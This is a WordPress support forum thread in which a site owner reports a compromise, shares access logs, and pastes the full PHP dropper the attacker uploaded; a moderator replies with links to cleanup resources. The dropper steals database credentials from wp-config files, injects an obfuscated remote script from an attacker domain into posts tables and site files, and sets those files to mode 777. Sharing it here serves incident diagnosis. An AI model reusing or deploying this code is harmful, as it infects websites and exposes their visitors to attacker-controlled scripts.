• jaxprov

    (@jaxprov)


    We have the latest version of WordPress, and our site was attacked with injections in both code (WP and all plugins) and database.

    The code that was injected was:
    Database:
    <script src=\'https://js.xxxxxxxxxx.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>
    PHP Files:
    <script src='https://js.xxxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script>

    Our server logs showed the wp-load.php was attacked:

    54.206.73.91 - - [31/Jul/2020:13:46:06 +1200] "POST /wp-load.php?pubkey=xxxxxxxxxxxx&bvTime=1596159965&bvVersion=0.1&bvMethod=activateinfo&sha1=true&sig=xxxxxxxxx HTTP/1.1" 200 1340 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:09 +1200] "POST /wp-load.php?pubkey=xxxxxxx&bvTime=1596159968&bvVersion=0.1&bvMethod=updt&sha1=true&sig=xxxxxx HTTP/1.1" 200 714 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:11 +1200] "POST /wp-load.php?pubkey=xxxxxx&bvTime=1596159970&bvVersion=0.1&bvMethod=getoption&sha1=true&sig=xxxxx HTTP/1.1" 200 741 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:15 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159974&bvVersion=0.1&bvMethod=gtwp&sha1=true&sig=xxxxx HTTP/1.1" 200 1335 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:22 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159981&bvVersion=0.1&bvMethod=gtsym&sha1=true&sig=xxxxx HTTP/1.1" 200 830 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:25 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159984&bvVersion=0.1&bvMethod=gtusrs&sha1=true&sig=xxxxx HTTP/1.1" 200 1988 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    
    [redundant lines redacted]

    it uploaded a document that was executed at the site root:

    <?php error_reporting(E_ALL);
    ini_set('display_errors',1);
    
    @search_file_index($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index.");
    
      
    function get_var_reg($pat,$text) {
    	
    	if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
    	{
    		return $matches[1][0];
    	}
    		
    	return "";
    }
    function search_file_ms($dir,$file_to_search){
    
    $search_array = array();
    
    $files = scandir($dir);
    
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_ms( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_ms( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false) {
    		
    			show_sitenames($path);
    			
    			
    			
            }
    
        } else if($value != "." && $value != "..") {
    
            @search_file_ms($path, $file_to_search);
    
        }  
     } 
    }
    function show_sitenames($file){
    	$content = @file_get_contents($file);
    	if(strpos($content, "DB_NAME") !== false) {
    	
    	
    	$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
    
    // Create connection
    $conn = new mysqli($host, $user, $pass);
    
    // Check connection
    if ($conn->connect_error) {
     
    } else { 
    
    $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'";
    $result = $conn->query($q);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
    		$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
    	$result2 = $conn->query($q2);
    	if ($result2->num_rows > 0) {
    		while($row2 = $result2->fetch_assoc()) {
    			$val = $row2['post_content'];
    			if(strpos($val, "developerstatss") === false){
    				if(strpos($val, "developerstatss") === false){
    					
    				
    					$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://js.developerstatss.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%developerstatss%'";
    					$conn->query($q3);
    					echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
    				
    				} else {
    				
    				}
    
    			} 
    		}
    	} else {
    	}
        }
    } else {
    }
    $conn->close();
    }
    }
    }
    
    function search_file($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file($path, $file_to_search);
    
        }  
     } 
    
    }
    
    function search_file_index($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_index( $dir,"index.");
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_index( $dir,"index.");
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it_index($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_index($path, $file_to_search);
    
        }  
     } 
    
    }
    function search_file_js($dir,$file_to_search){
    
    $files = @scandir($dir);
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_js( $dir,".js");
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_js( $dir,".js");
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
    
    		make_it_js($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_js($path, $file_to_search);
    
        }  
     } 
    
    }
    
    function make_it_js($f){
    			$g = file_get_contents($f);
    			
    										
    
    if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46') !== false) {
    
    } else {
    
    $l2 = base64_decode("RWxlbWVudC5wcm90b3R5cGUuYXBwZW5kQWZ0ZXIgPSBmdW5jdGlvbihlbGVtZW50KSB7ZWxlbWVudC5wYXJlbnROb2RlLmluc2VydEJlZm9yZSh0aGlzLCBlbGVtZW50Lm5leHRTaWJsaW5nKTt9LCBmYWxzZTsoZnVuY3Rpb24oKSB7IHZhciBlbGVtID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudChTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTsgZWxlbS50eXBlID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2KTsgZWxlbS5zcmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsMTA2LDExNSw0NiwxMDAsMTAxLDExOCwxMDEsMTA4LDExMSwxMTIsMTAxLDExNCwxMTUsMTE2LDk3LDExNiwxMTUsMTE1LDQ2LDEwMyw5Nyw0NywxMTUsMTE2LDk3LDExNiw0NiwxMDYsMTE1LDYzLDExMCw2MSwxMTAsMTEwLDUxKTtlbGVtLmFwcGVuZEFmdGVyKGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKFN0cmluZy5mcm9tQ2hhckNvZGUoMTE1LDk5LDExNCwxMDUsMTEyLDExNikpWzBdKTtlbGVtLmFwcGVuZEFmdGVyKGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LDEwMSw5NywxMDApKVswXSk7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTAxLDk3LDEwMCkpWzBdLmFwcGVuZENoaWxkKGVsZW0pO30pKCk7");
    $g = file_get_contents($f);
    $g = $l2.$g;
    @system('chmod 777 '.$f);
    @file_put_contents($f,$g);
    echo "js:".$f."\r\n";
    }
    
    			
    }
    function make_it_index($f){
    
    if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116') !== false || strpos($g, 'developerstatss.ga') !== false) {
    
    } else {
    $l2 = "<script type='text/javascript' src='https://js.developerstatss.ga/stat.js?n=nb5'></script>";
    $g = file_get_contents($f);
    $g = $l2.$g;
    
    @system('chmod 777 '.$f);
    @file_put_contents($f,$g);
    echo "in:".$f."\r\n";
    
    			}
    }
    
    function make_it($f){
    $g = file_get_contents($f);
    if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,49') !== false) {
    
    } else {
    $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,110,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
    if (strpos($g, '<head>') !== false) {
    $b = str_replace("<head>","<head>".$l2,$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    echo "hh:".$f."\r\n";
    }
    if (strpos($g, '</head>') !== false) {
    $b = str_replace("</head>",$l2."</head>",$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    echo "hh:".$f."\r\n";
    }
    
    			}
    }
Viewing 1 replies (of 1 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Viewing 1 replies (of 1 total)
  • The topic ‘5.4.2 Attacked’ is closed to new replies.